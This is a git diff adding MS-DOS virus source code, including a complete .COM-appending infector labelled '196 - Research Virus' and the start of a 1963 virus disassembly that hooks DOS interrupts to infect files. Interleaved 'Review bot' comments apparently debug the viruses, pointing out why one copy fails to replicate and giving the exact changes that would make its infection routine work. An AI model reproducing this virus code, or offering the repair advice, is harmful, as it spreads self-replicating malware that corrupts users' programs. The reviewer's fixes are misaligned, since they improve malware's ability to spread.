+virus_size EQU vir_end-vir_start
+variable_diff EQU variables_start-next_byte
+
+highlander:
+ call vir_start ;call virus
+ mov ah,4ch ;return to operating system
+ int 21h ;thru' dos interrupt 21h
+
+vir_start:
+ call next_byte ;call next address
+
+next_byte:
+ pop ax ;get virus address
+ pop di ;get program start address
+ push ax ;save virus address
+
+ pop si ;get address of next_byte
+ mov ax,variable_diff ;add difference
+ add si,ax ;get variables address
+
+ mov ax,3 ;move to old address
+ sub di,ax ;start of .com file
+ add si,ax ;point to old code
+ mov ax,[si] ;get two bytes from old code
+ mov [di],ax ;and place at start of file
+ inc si ;increment to third byte
+ inc si ;
+ inc di ;increment to third address to save
+ inc di ;
+ mov al,[si] ;get last byte of old code
+ mov [di],al ;and place at start of .COM file
+ mov ax,5 ;five bytes out
+ sub si,ax ;back to start of variables
+
+ mov di,si ;which is copied to destination
+ mov ax,6 ;add 6 to variables address
+ add di,ax ;and save file control block
+
+;search for first
+ mov ah,4eh ;search for first
+ xor cx,cx ;attributes to search
+ mov dx,di ;point to fcb
+ int 21h ;call dos
+ jc return_to_prog ;if no file found return to program
+
+found_one:
+ mov ah,2fh ;get DTA address into es:bx
+ int 21h ;call dos
+ mov ax,22 ;jump over to time
+ add bx,ax ;and point to it
+ mov al,es:[bx] ;and place in ax
+ and al,00000111b ;get seconds only
+ cmp al,00h ;zero seconds?
+ jnz infect_program ;if not infect program
+ mov ah,4fh ;find next file
+ int 21h ;call dos
+ jmp short found_one ;jump back
+
+infect_program:
+ mov ax,8 ;jump to asciiz fcb
+ add ax,bx ;add to bx
+ mov dx,ax ;and move to dx
+ mov ax,3d02h ;open file for writing
+ int 21h ;call dos
+ jnc continue ;continue if no error
+
+ mov ah,4fh ;search for next
+ xor cx,cx ;attributes to search
+ int 21h ;call dos
+ jc return_to_prog ;if no file found return to program
+ jmp short found_one ;jump forward if one found
+
+continue:
+ mov bx,ax ;transfer file handle to bx
+
+;read first three bytes
+ mov ah,3fh ;read file
+ mov cx,3 ;number of bytes to read
+ mov dx,3 ;three bytes to old_code
+ add dx,si ;point to buffer to read
+ int 21h ;call dos
+
+ mov ax,4202h ;move file pointer to end of file
+ xor cx,cx ;clear cx
+ xor dx,dx ;clear dx
+ int 21h ;call dos
+ dec ax ;decrement ax
+ dec ax ;
+ dec ax ;
+ dec si ;save address
+ mov word [si],ax ;and store
+
+ mov ah,40h ;write to file
+ mov cx,virus_size ;set counter to write
+ mov dx,offset vir_start ;point to buffer to start
+ int 21h ;and write to file
+
+ mov ax,4200h ;move file pointer to start of file
+ xor cx,cx ;clear cx
+ xor dx,dx ;clear dx
+ int 21h ;call dos
+
+ mov ah,40h ;write to file
+ mov cx,3 ;set counter to write
+ inc si ;point to jump address
+ mov dx,si ;point to buffer to start
+ int 21h ;and write to file
+
+ mov ax,5701h ;set date & time
+ xor cx,cx ;time set to zero
+ xor dx,dx ;and date
+ int 21h ;and do it
+ mov ah,3eh ;close file
+ int 21h ;thru' dos
+
+return_to_prog:
+ mov ah,4ch ;terminate program
+ int 21h ;exit to dos
+
+variables_start:
+jump_add:
+ db 0e8h,0,0
+old_code:
+ db 90h,90h,90h
+fcb:
+ db "*.COM",0
+variables_end:
+
+vir_end:
+
+CODE ENDS
+
+ END highlander
+
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.196.asm b/MSDOS/Virus.MSDOS.Unknown.196.asm
new file mode 100644
index 00000000..46177d13
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.196.asm
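Review bot: The find-next under `found_one` has no error check: `mov ah,4fh` / `int 21h` / `jmp short found_one` loops back unconditionally, so once the directory's last matching entry is already marked (time bits 0–2 clear) a failing 4Fh, which as far as I know leaves the DTA untouched, makes the loop re-read the same marker forever instead of exiting. The second find-next under `infect_program` does test carry, so the fix is the same single line between that `int 21h` and the `jmp`: `jc return_to_prog`. Separately, this file is byte-identical to the 196.asm added by the same commit (both blobs are `46177d13`) and its own banner reads "196 - Research Virus", so the "189" name looks like a corpus labelling error rather than a distinct sample; a one-line note in the banner, `; duplicate of Virus.MSDOS.Unknown.196.asm — see its header`, would save the next analyst a diff.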
@@ -0,0 +1,152 @@
+;***************************************************************************
+;* *
+;* 196 - Research Virus Version 1.01 Date. 11th April 1992. *
+;* *
+;* Written By : F.Deakin (ACE COMPUTER SYSTEMS) *
+;* *
+;* Non-Overwriting Version of 97 Virus *
+;* *
+;***************************************************************************
+
+CODE Segment
+ Assume CS:CODE
+
+progr equ 100h
+
+ org progr
+
+virus_size EQU vir_end-vir_start
+variable_diff EQU variables_start-next_byte
+
+highlander:
+ call vir_start ;call virus
+ mov ah,4ch ;return to operating system
+ int 21h ;thru' dos interrupt 21h
+
+vir_start:
+ call next_byte ;call next address
+
+next_byte:
+ pop ax ;get virus address
+ pop di ;get program start address
+ push ax ;save virus address
+
+ pop si ;get address of next_byte
+ mov ax,variable_diff ;add difference
+ add si,ax ;get variables address
+
+ mov ax,3 ;move to old address
+ sub di,ax ;start of .com file
+ add si,ax ;point to old code
+ mov ax,[si] ;get two bytes from old code
+ mov [di],ax ;and place at start of file
+ inc si ;increment to third byte
+ inc si ;
+ inc di ;increment to third address to save
+ inc di ;
+ mov al,[si] ;get last byte of old code
+ mov [di],al ;and place at start of .COM file
+ mov ax,5 ;five bytes out
+ sub si,ax ;back to start of variables
+
+ mov di,si ;which is copied to destination
+ mov ax,6 ;add 6 to variables address
+ add di,ax ;and save file control block
+
+;search for first
+ mov ah,4eh ;search for first
+ xor cx,cx ;attributes to search
+ mov dx,di ;point to fcb
+ int 21h ;call dos
+ jc return_to_prog ;if no file found return to program
+
+found_one:
+ mov ah,2fh ;get DTA address into es:bx
+ int 21h ;call dos
+ mov ax,22 ;jump over to time
+ add bx,ax ;and point to it
+ mov al,es:[bx] ;and place in ax
+ and al,00000111b ;get seconds only
+ cmp al,00h ;zero seconds?
+ jnz infect_program ;if not infect program
+ mov ah,4fh ;find next file
+ int 21h ;call dos
+ jmp short found_one ;jump back
+
+infect_program:
+ mov ax,8 ;jump to asciiz fcb
+ add ax,bx ;add to bx
+ mov dx,ax ;and move to dx
+ mov ax,3d02h ;open file for writing
+ int 21h ;call dos
+ jnc continue ;continue if no error
+
+ mov ah,4fh ;search for next
+ xor cx,cx ;attributes to search
+ int 21h ;call dos
+ jc return_to_prog ;if no file found return to program
+ jmp short found_one ;jump forward if one found
+
+continue:
+ mov bx,ax ;transfer file handle to bx
+
+;read first three bytes
+ mov ah,3fh ;read file
+ mov cx,3 ;number of bytes to read
+ mov dx,3 ;three bytes to old_code
+ add dx,si ;point to buffer to read
+ int 21h ;call dos
+
+ mov ax,4202h ;move file pointer to end of file
+ xor cx,cx ;clear cx
+ xor dx,dx ;clear dx
+ int 21h ;call dos
+ dec ax ;decrement ax
+ dec ax ;
+ dec ax ;
+ dec si ;save address
+ mov word [si],ax ;and store
+
+ mov ah,40h ;write to file
+ mov cx,virus_size ;set counter to write
+ mov dx,offset vir_start ;point to buffer to start
+ int 21h ;and write to file
+
+ mov ax,4200h ;move file pointer to start of file
+ xor cx,cx ;clear cx
+ xor dx,dx ;clear dx
+ int 21h ;call dos
+
+ mov ah,40h ;write to file
+ mov cx,3 ;set counter to write
+ inc si ;point to jump address
+ mov dx,si ;point to buffer to start
+ int 21h ;and write to file
+
+ mov ax,5701h ;set date & time
+ xor cx,cx ;time set to zero
+ xor dx,dx ;and date
+ int 21h ;and do it
+ mov ah,3eh ;close file
+ int 21h ;thru' dos
+
+return_to_prog:
+ mov ah,4ch ;terminate program
+ int 21h ;exit to dos
+
+variables_start:
+jump_add:
+ db 0e8h,0,0
+old_code:
+ db 90h,90h,90h
+fcb:
+ db "*.COM",0
+variables_end:
+
+vir_end:
+
+CODE ENDS
+
+ END highlander
+
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.1963.asm b/MSDOS/Virus.MSDOS.Unknown.1963.asm
new file mode 100644
index 00000000..7449bfa5
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.1963.asm
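Review bot: `mov dx,offset vir_start` before the body write is an assemble-time constant, whereas the rest of the routine recovers its runtime position through the `call next_byte` / `pop` delta kept in `si`; in an infected host the virus body lives at 100h plus the host's length, so that write copies host bytes from offset 103h rather than the virus and second-generation copies appear non-viable. As far as I can trace, the jump patch is also off by two: `si` still equals `variables_start` at `continue`, so `dec si` / `mov word [si],ax` stores the displacement over the byte preceding `jump_add` and its `0e8h`, and the later `inc si` then writes `hi,00,00` instead of `E8 lo hi` as the host's new first three bytes. Swapping the two adjustments (`inc si` before the store, `dec si` before `mov dx,si`), writing the store as `mov word ptr [si],ax` (MASM/TASM reject the bare `word`), and deriving the body-write `dx` from `si` with the constant `variables_start-vir_start` instead of `offset vir_start` would make the patched header and the copied body consistent with the delta the code already computes. Whether this sample was deliberately left non-replicating as a "research virus" is not stated in the banner, so a header comment recording that the 5701h call marks files by zeroing their time and date and that the host is never re-entered (`return_to_prog` exits via 4Ch after restoring the three bytes at 100h) would help readers judge that.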
@@ -0,0 +1,1292 @@ + +PAGE 59,132 + +; +; +; 1963 VIRUS +; +; disassembly by +; +; DecimatoR / SKISM +; +; 01/15/92 Compile with TASM 2.0 DW 717-367-3501 +; + +data_1e equ 4 ; (0000:0004=7FBh) +data_2e equ 6 ; (0000:0006=70h) +data_3e equ 4Ch ; (0000:004C=88h) +data_4e equ 84h ; (0000:0084=16h) +data_6e equ 0Ah ; (0046:000A=0) +data_7e equ 16h ; (0046:0016=0) +data_8e equ 2Ch ; (0046:002C=50h) +data_9e equ 8ABh ; (0046:08AB=4146h) +data_10e equ 8ADh ; (0046:08AD=3154h) +data_11e equ 0Ah ; (08D4:000A=2F9h) +data_12e equ 0Ch ; (08D4:000C=3872h) +data_13e equ 100h ; (08D4:0100=0DFh) +data_14e equ 1 ; (4815:0001=0FFFFh) +data_15e equ 100h ; (4816:0100=0FFh) +data_16e equ 1 ; (8343:0001=0FFFFh) +data_17e equ 0Ah ; (8344:000A=0) +data_18e equ 0Eh ; (8344:000E=8344h) +data_49e equ 900h ; (8344:0900=0) +data_50e equ 902h ; (8344:0902=0) +data_51e equ 904h ; (8344:0904=8344h) +data_52e equ 906h ; (8344:0906=0) +data_53e equ 9EFh ; (8344:09EF=0) +data_54e equ 10AFh ; (8344:10AF=0) +data_55e equ 10B1h ; (8344:10B1=0) +data_56e equ 10B3h ; (8344:10B3=0) + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +virus proc far + +start: + mov ah,30h ; '0' + int 21h ; DOS Services ah=function 30h + ; get DOS version number ax + cmp al,3 + jb loc_1 ; Jump if below + mov ax,1200h + int 2Fh ; Multiplex/Spooler al=func 00h + ; get installed status + cmp al,0FFh +loc_1: + mov ax,0Bh + jc loc_4 ; Jump if carry Set + mov ah,4Ah ; 'J' + mov bx,140h + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + jc loc_4 ; Jump if carry Set + cli ; Disable interrupts + push cs + pop ss + mov sp,13FEh + call sub_1 ; (01EB) + sti ; Enable interrupts + mov ax,ds:data_8e ; (0046:002C=50h) + or ax,ax ; Zero ? 
+ jz loc_5 ; Jump if zero + call sub_13 ; (07EC) + mov es,ax + xor di,di ; Zero register + xor ax,ax ; Zero register +loc_2: + scasw ; Scan es:[di] for ax + jnz loc_2 ; Jump if not zero + scasw ; Scan es:[di] for ax + mov dx,di + push es + pop ds + mov ah,48h ; 'H' + mov bx,0FFFFh + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + mov ah,48h ; 'H' + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + mov es,ax + mov ah,49h ; 'I' + int 21h ; DOS Services ah=function 49h + ; release memory block, es=seg + xor ax,ax ; Zero register + mov cx,bx + mov bx,es + +locloop_3: + push cx + mov cx,8 + xor di,di ; Zero register + rep stosw ; Rep when cx >0 Store ax to es:[di] + inc bx + mov es,bx + pop cx + loop locloop_3 ; Loop if cx > 0 + + push cs + pop es + mov bx,data_51e ; (8344:0904=44h) + mov di,bx + stosw ; Store ax to es:[di] + mov al,80h + stosw ; Store ax to es:[di] + mov ax,cs + stosw ; Store ax to es:[di] + mov ax,5Ch + stosw ; Store ax to es:[di] + mov ax,cs + stosw ; Store ax to es:[di] + mov ax,6Ch + stosw ; Store ax to es:[di] + mov ax,cs + stosw ; Store ax to es:[di] + mov ax,4B00h + int 21h ; DOS Services ah=function 4Bh + ; run progm @ds:dx, parm @es:bx +loc_4: + push cs + pop ds + call sub_13 ; (07EC) + jmp dword ptr cs:data_17e ; (8344:000A=0) +loc_5: + mov ax,1220h + mov bx,5 + int 2Fh ; ??INT Non-standard interrupt. + push bx + dec bx + dec bx + mov es:[di],bl + mov ax,1216h + int 2Fh ; ??INT Non-standard interrupt. + dec bx + dec bx + mov es:[di],bx + mov ah,48h ; 'H' + mov bx,0FFFFh + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + mov ah,48h ; 'H' + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + mov ds,ax + pop bx + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov ah,3Fh ; '?' 
+ mov dx,data_15e ; (4816:0100=0FFh) + mov cx,es:[di+11h] + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + jc loc_4 ; Jump if carry Set + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + mov ah,26h ; '&' + mov dx,ds + int 21h ; DOS Services ah=function 26h + ; create progm seg prefix dx + dec dx + mov es,dx + mov es:data_14e,ds ; (4815:0001=0FFFFh) + inc dx + mov es,dx + mov ss,dx + mov sp,0FFFEh + push ds + mov ax,100h + push ax + retf ; Return far + +virus endp + +; +; SUBROUTINE +; + +sub_1 proc near + push ds + mov ax,1203h + int 2Fh ; Multiplex/Spooler al=func 03h + ; remove all files from queue + mov cs:data_51e,ds ; (8344:0904=8344h) + xor si,si ; Zero register + mov ds,si + mov di,288h + mov si,cs + xchg di,ds:data_1e ; (0000:0004=7FBh) + xchg si,ds:data_2e ; (0000:0006=70h) + pushf ; Push flags + pushf ; Push flags + pushf ; Push flags + mov bp,sp + or byte ptr [bp+1],1 + popf ; Pop flags + pushf ; Push flags + pushf ; Push flags + mov word ptr cs:data_52e,8AFh ; (8344:0906=0) + mov ah,1 + call dword ptr ds:data_3e ; (0000:004C=2288h) + popf ; Pop flags + mov word ptr cs:data_52e,8ABh ; (8344:0906=0) + mov ah,0Bh + call dword ptr ds:data_4e ; (0000:0084=1716h) + popf ; Pop flags + mov ds:data_1e,di ; (0000:0004=7FBh) + mov ds:data_2e,si ; (0000:0006=70h) + pop ds + push ds + push es + mov bx,cs + mov bp,2AEh + mov ax,ds:data_9e ; (0046:08AB=4146h) + mov dx,ds:data_10e ; (0046:08AD=3154h) + xor si,si ; Zero register + mov ds,si + cmp ax,ds:data_4e ; (0000:0084=1716h) + jne loc_6 ; Jump if not equal + cmp dx,word ptr ds:data_4e+2 ; (0000:0086=2C7h) + jne loc_6 ; Jump if not equal + mov ds:data_4e,bp ; (0000:0084=1716h) + mov word ptr ds:data_4e+2,bx ; (0000:0086=2C7h) + jmp short loc_10 ; (0285) +loc_6: + mov ax,8ABh + mov es,bx + mov cx,10h + cld ; Clear direction + +locloop_7: + mov di,ax + mov ds,dx + cmpsw ; Cmp [si] to es:[di] + jnz loc_9 ; Jump if not zero + cmpsw ; Cmp [si] to 
es:[di] + jnz loc_8 ; Jump if not zero + mov [si-4],bp + mov [si-2],bx +loc_8: + dec si + dec si +loc_9: + dec si + loop locloop_7 ; Loop if cx > 0 + + xchg si,cx + inc dx + cmp dx,bx + jne locloop_7 ; Jump if not equal +loc_10: + pop es + pop ds + retn +sub_1 endp + + push bp + mov bp,sp + push ax + mov ax,[bp+4] + cmp ax,cs:data_51e ; (8344:0904=8344h) + ja loc_11 ; Jump if above + push bx + mov bx,cs:data_52e ; (8344:0906=0) + mov cs:[bx+2],ax + mov ax,[bp+2] + mov cs:[bx],ax + and byte ptr [bp+7],0FEh + pop bx +loc_11: + pop ax + pop bp + iret ; Interrupt return + db 55h, 8Bh,0ECh, 80h,0FCh, 48h + db 74h, 0Ah, 80h,0FCh, 4Ah, 74h + db 05h, 3Dh, 03h, 4Bh, 75h, 0Ch + db 0E8h, 89h, 05h,0E8h,0AFh, 05h + db 9Ch,0E8h, 87h, 05h,0EBh, 55h + db 80h,0FCh, 31h, 74h, 05h, 80h + db 0FCh + db 4Ch, 75h, 0Dh +loc_12: + push bx + mov bx,13h +loc_13: + call sub_5 ; (0532) + dec bx + jns loc_13 ; Jump if not sign + pop bx + jmp short loc_23 ; (0342) +loc_14: + cmp ah,0Fh + je loc_15 ; Jump if equal + cmp ah,10h + je loc_15 ; Jump if equal + cmp ah,17h + je loc_15 ; Jump if equal + cmp ah,23h ; '#' + jne loc_16 ; Jump if not equal +loc_15: + call sub_15 ; (081F) + jmp short loc_23 ; (0342) +loc_16: + cmp ah,3Fh ; '?' 
+ jne loc_20 ; Jump if not equal + call sub_5 ; (0532) + jnc loc_18 ; Jump if carry=0 + mov ax,5 +loc_17: + jmp loc_37 ; (0403) +loc_18: + jnz loc_23 ; Jump if not zero + call sub_22 ; (0875) + jc loc_17 ; Jump if carry Set + pushf ; Push flags + call sub_24 ; (0884) + push ds + pop es + mov di,dx + call sub_11 ; (0785) + call sub_25 ; (0896) +loc_19: + popf ; Pop flags + pop bp + retf 2 ; Return far +loc_20: + cmp ah,3Dh ; '=' + je loc_21 ; Jump if equal + cmp ah,43h ; 'C' + je loc_21 ; Jump if equal + cmp ah,56h ; 'V' + jne loc_22 ; Jump if not equal +loc_21: + call sub_3 ; (0519) + jmp short loc_23 ; (0342) +loc_22: + cmp ah,3Eh ; '>' + jne loc_24 ; Jump if not equal + call sub_5 ; (0532) +loc_23: + push word ptr [bp+6] + popf ; Pop flags + pop bp + cli ; Disable interrupts + jmp dword ptr cs:data_20 ; (8344:08AB=0) +loc_24: + cmp ah,14h + je loc_25 ; Jump if equal + cmp ah,21h ; '!' + je loc_25 ; Jump if equal + cmp ah,27h ; ''' + je loc_25 ; Jump if equal + jmp loc_35 ; (03DE) +loc_25: + call sub_15 ; (081F) + jnc loc_27 ; Jump if carry=0 +loc_26: + pop bp + mov al,1 + iret ; Interrupt return +loc_27: + jnz loc_23 ; Jump if not zero + call sub_24 ; (0884) + call sub_14 ; (0814) + cmp ah,14h + jne loc_28 ; Jump if not equal + mov ax,[si+0Ch] + mov dx,80h + mul dx ; dx:ax = reg * ax + xor bx,bx ; Zero register + add al,[si+20h] + adc ah,bl + adc bx,dx + xchg ax,bx + jmp short loc_29 ; (038F) +loc_28: + mov ax,[si+23h] + mov bx,[si+21h] +loc_29: + mov cx,[si+0Eh] + mul cx ; dx:ax = reg * ax + jnc loc_31 ; Jump if carry=0 +loc_30: + call sub_25 ; (0896) + jmp short loc_26 ; (0364) +loc_31: + xchg ax,bx + mul cx ; dx:ax = reg * ax + add dx,bx + jc loc_30 ; Jump if carry Set + mov cs:data_37,ax ; (8344:08D0=0) + mov cs:data_38,dx ; (8344:08D2=0) + mov cs:data_39,cx ; (8344:08D4=0) + call sub_25 ; (0896) + call sub_22 ; (0875) + or al,al ; Zero ? 
+ jz loc_32 ; Jump if zero + cmp al,3 + jne loc_34 ; Jump if not equal +loc_32: + call sub_24 ; (0884) + cmp ah,27h ; ''' + mov ax,cs:data_39 ; (8344:08D4=0) + jnz loc_33 ; Jump if not zero + mul cx ; dx:ax = reg * ax + jc loc_30 ; Jump if carry Set +loc_33: + push ax + mov ah,2Fh ; '/' + int 21h ; DOS Services ah=function 2Fh + ; get DTA ptr into es:bx + mov di,bx + pop ax + call sub_11 ; (0785) + call sub_25 ; (0896) +loc_34: + pop bp + iret ; Interrupt return +loc_35: + cmp ax,4B00h + je loc_38 ; Jump if equal + cmp ax,4B01h + je loc_36 ; Jump if equal + jmp loc_23 ; (0342) +loc_36: + call sub_2 ; (042F) + jc loc_37 ; Jump if carry Set + push si + push di + push ds + push cs + pop ds + mov si,offset data_41 ; (8344:08E2=0) + lea di,[bx+0Eh] ; Load effective addr + cld ; Clear direction + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + pop ds + pop di + pop si +loc_37: + pushf ; Push flags + shr byte ptr [bp+6],1 ; Shift w/zeros fill + popf ; Pop flags + rcl byte ptr [bp+6],1 ; Rotate thru carry + pop bp + iret ; Interrupt return +loc_38: + call sub_2 ; (042F) + jc loc_37 ; Jump if carry Set + push ax + mov ah,51h ; 'Q' + int 21h ; DOS Services ah=function 51h + ; get active PSP segment in bx + mov ds,bx + mov es,bx + pop ax + cli ; Disable interrupts + mov sp,cs:data_41 ; (8344:08E2=0) + mov ss,cs:data_42 ; (8344:08E4=0) + inc sp + inc sp + sti ; Enable interrupts + jmp dword ptr cs:data_43 ; (8344:08E6=0) + +; +; SUBROUTINE +; + +sub_2 proc near + call sub_24 ; (0884) + stc ; Set carry flag + call sub_4 ; (051A) +loc_39: + mov ax,0Bh + jc loc_40 ; Jump if carry Set + cld ; Clear direction + pushf ; Push flags + push ds + mov ax,3522h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov cs:data_24,bx ; (8344:08B7=0) + mov word ptr cs:data_24+2,es ; (8344:08B9=8344h) + lds si,dword ptr [bp+0Ah] ; Load 32 bit ptr + push cs + pop es + mov di,offset data_39 ; 
(8344:08D4=0) + mov bx,di + mov cx,7 + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + pop ds + call sub_16 ; (084C) + push dx + mov ax,4B01h + call sub_23 ; (0879) + pop dx + call sub_17 ; (0851) + jnc loc_42 ; Jump if carry=0 +loc_40: + mov [bp+8],ax +loc_41: + call sub_25 ; (0896) + retn +loc_42: + mov [bp+8],ax + mov ah,51h ; 'Q' + int 21h ; DOS Services ah=function 51h + ; get active PSP segment in bx + mov es,bx + mov si,[bp] + lds dx,dword ptr ss:[si+2] ; Load 32 bit ptr + mov es:data_11e,dx ; (08D4:000A=2F9h) + mov es:data_12e,ds ; (08D4:000C=3872h) + mov ax,2522h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + popf ; Pop flags + jnz loc_41 ; Jump if not zero + push cs + pop ds + mov si,data_51e ; (8344:0904=44h) + mov di,data_13e ; (08D4:0100=0DFh) + mov cx,7ABh + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + call sub_7 ; (0758) + jz loc_44 ; Jump if zero +loc_43: + clc ; Clear carry flag + jmp short loc_41 ; (0470) +loc_44: + mov di,bx + add di,10h + mov ax,ds:data_55e ; (8344:10B1=0) + mov word ptr data_43,ax ; (8344:08E6=0) + mov ax,ds:data_56e ; (8344:10B3=0) + add ax,di + mov word ptr data_43+2,ax ; (8344:08E8=0) + mov cx,ds:data_54e ; (8344:10AF=0) + or cx,cx ; Zero ? 
+ jz loc_43 ; Jump if zero + lds dx,dword ptr [bp+0Eh] ; Load 32 bit ptr + call sub_18 ; (0862) + jc loc_47 ; Jump if carry Set + mov bx,ax + push cx + push cs + pop ds + xor cx,cx ; Zero register + mov dx,ds:data_50e ; (8344:0902=0) + call sub_20 ; (086B) + mov dx,904h + pop cx + +locloop_45: + push cx + mov cx,4 + call sub_8 ; (0764) + pop cx + jc loc_46 ; Jump if carry Set + mov si,dx + push ds + mov ax,[si+2] + mov si,[si] + add ax,di + mov ds,ax + add [si],di + pop ds + loop locloop_45 ; Loop if cx > 0 + + call sub_19 ; (0867) + jmp short loc_43 ; (04A8) +loc_46: + call sub_19 ; (0867) +loc_47: + push es + pop ds + les bx,dword ptr cs:data_24 ; (8344:08B7=0) Load 32 bit ptr + mov ds:data_17e,bx ; (8344:000A=0) + mov ds:data_18e,es ; (8344:000E=8344h) + call sub_13 ; (07EC) + stc ; Set carry flag + jmp loc_39 ; (0436) +sub_2 endp + + +; +; SUBROUTINE +; + +sub_3 proc near + clc ; Clear carry flag + +; External Entry into Subroutine + +sub_4: + push ax + push bx + pushf ; Push flags + call sub_18 ; (0862) + jc loc_48 ; Jump if carry Set + mov bx,ax + popf ; Pop flags + pushf ; Push flags + call sub_6 ; (0533) + pushf ; Push flags + call sub_19 ; (0867) + popf ; Pop flags +loc_48: + pop bx + pop bx + pop ax + retn +sub_3 endp + + +; +; SUBROUTINE +; + +sub_5 proc near + clc ; Clear carry flag + +; External Entry into Subroutine + +sub_6: + cld ; Clear direction + call sub_24 ; (0884) + pushf ; Push flags + push bx + mov ax,1220h + int 2Fh ; ??INT Non-standard interrupt. + jc loc_49 ; Jump if carry Set + xor bh,bh ; Zero register + mov bl,es:[di] + mov ax,1216h + int 2Fh ; ??INT Non-standard interrupt. 
+ jnc loc_50 ; Jump if carry=0 +loc_49: + call sub_25 ; (0896) + retn +loc_50: + push es + push cs + pop ds + mov ax,3523h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov data_26,bx ; (8344:08BB=0) + mov word ptr data_26+2,es ; (8344:08BD=8344h) + inc ax + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov data_28,bx ; (8344:08BF=0) + mov word ptr data_28+2,es ; (8344:08C1=8344h) + mov ah,25h ; '%' + mov dx,offset int_24h_entry + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + dec ax + inc dx + inc dx + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop es + pop bx + mov al,2 + xchg al,es:[di+2] + mov data_33,al ; (8344:08C9=0) + mov ax,es:[di+5] + mov data_34,ax ; (8344:08CA=0) + mov ax,es:[di+15h] + mov data_37,ax ; (8344:08D0=0) + mov ax,es:[di+17h] + mov data_38,ax ; (8344:08D2=0) + mov ax,es:[di+11h] + mov dx,es:[di+13h] + mov data_35,ax ; (8344:08CC=0) + mov data_36,dx ; (8344:08CE=0) + cmp ax,1Ah + sbb dx,0 + jc loc_55 ; Jump if carry Set + popf ; Pop flags + jc loc_52 ; Jump if carry Set + mov ax,es:[di+28h] + cmp ax,5845h + je loc_51 ; Jump if equal + cmp ax,4F43h + jne loc_55 ; Jump if not equal + mov al,4Dh ; 'M' +loc_51: + cmp al,es:[di+2Ah] + jne loc_55 ; Jump if not equal +loc_52: + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_20 ; (086B) + mov dx,8EAh + mov cl,1Ah + call sub_8 ; (0764) + jc loc_57 ; Jump if carry Set + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_7 ; (0758) + jnz loc_53 ; Jump if not zero + mov ax,data_47 ; (8344:08F2=0) + mov dl,10h + mul dx ; dx:ax = reg * ax + mov cx,dx + mov dx,ax +loc_53: + push cx + push dx + add dx,7ABh + adc cx,0 + cmp cx,data_36 ; (8344:08CE=0) + jne loc_54 ; Jump if not equal + cmp dx,data_35 ; (8344:08CC=0) +loc_54: + pop dx + pop cx + jbe loc_56 ; Jump if below or = +loc_55: + jmp short loc_62 ; (065D) +loc_56: + push cx + push dx + call sub_20 ; 
(086B) + mov dx,904h + mov cx,7ABh + call sub_8 ; (0764) + jnc loc_58 ; Jump if carry=0 +loc_57: + jmp short loc_60 ; (0656) +loc_58: + push es + push di + push cs + pop es + mov si,data_53e ; (8344:09EF=0) + mov di,offset ds:[1EBh] ; (8344:01EB=1Eh) + mov cx,0C3h + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + pop di + pop es + jnz loc_65 ; Jump if not zero + mov dx,cx + call sub_21 ; (0870) + mov cx,7ADh + mov dx,904h + call sub_7 ; (0758) + jnz loc_59 ; Jump if not zero + add cx,6 +loc_59: + add es:[di+11h],cx + adc word ptr es:[di+13h],0 + call sub_8 ; (0764) + jc loc_60 ; Jump if carry Set + mov si,dx + dec cx + dec cx + call sub_10 ; (0778) + cmp dx,[si] + je loc_61 ; Jump if equal +loc_60: + stc ; Set carry flag + jmp short loc_63 ; (0661) +loc_61: + cmp al,al + jmp short loc_63 ; (0661) +loc_62: + mov al,1 + cmp al,0 +loc_63: + pushf ; Push flags +loc_64: + mov si,offset data_33 ; (8344:08C9=0) + cld ; Clear direction + inc di + inc di + movsb ; Mov [si] to es:[di] + inc di + inc di + movsw ; Mov [si] to es:[di] + add di,0Ah + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + mov ax,2524h + lds dx,dword ptr data_28 ; (8344:08BF=0) Load 32 bit ptr + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + dec ax + lds dx,dword ptr cs:data_26 ; (8344:08BB=0) Load 32 bit ptr + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + popf ; Pop flags + call sub_25 ; (0896) + retn +loc_65: + test byte ptr es:[di+4],4 + jnz loc_62 ; Jump if not zero + mov ah,0Dh + int 21h ; DOS Services ah=function 0Dh + ; flush disk buffers to disk + push bx + push ds + push es + mov ax,3540h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov data_30,bx ; (8344:08C3=0) + mov word ptr data_30+2,es ; (8344:08C5=8344h) + mov al,13h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov data_22,bx ; (8344:08B3=0) + mov 
